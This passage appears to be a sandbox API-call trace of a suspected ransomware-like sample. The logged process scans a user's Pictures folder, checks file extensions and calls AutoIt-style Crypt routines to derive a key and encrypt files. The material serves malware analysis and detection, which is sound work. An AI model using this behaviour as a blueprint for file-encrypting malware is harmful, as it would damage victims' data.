1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0191.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0191.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.041] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0191.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.041] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.041] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0191.041] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.041] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0191.041] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0191.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.041] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.041] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.041] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.041] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x641db40, ftCreationTime.dwHighDateTime=0x1d5e120, ftLastAccessTime.dwLowDateTime=0x8da1e520, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0x8da1e520, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x542a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_jWe.png", cAlternateFileName="")) returned 0x90add8 [0191.042] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.042] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.042] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x641db40, ftCreationTime.dwHighDateTime=0x1d5e120, ftLastAccessTime.dwLowDateTime=0x8da1e520, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0x8da1e520, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x542a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_jWe.png", cAlternateFileName="")) returned 0x90add8 [0191.042] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.042] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.042] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.043] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_jWe.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.044] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.044] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0191.044] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.044] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.044] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.044] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.044] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.044] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.044] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x641db40, ftCreationTime.dwHighDateTime=0x1d5e120, ftLastAccessTime.dwLowDateTime=0x8da1e520, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0x8da1e520, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x542a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="_jWe.png", cAlternateFileName="")) returned 0x90ae18 [0191.045] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.045] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.045] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.045] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.045] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.045] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0191.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.045] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0191.045] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.045] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.046] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.046] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0191.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.047] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0191.048] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.048] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.048] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0191.048] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.048] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.048] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.048] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.048] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.048] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.048] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.048] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.048] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.048] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.048] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.049] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.049] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0191.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.049] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.049] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.049] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.049] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.049] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.049] PeekMessageW (in: lpMsg=0x87ebe4, 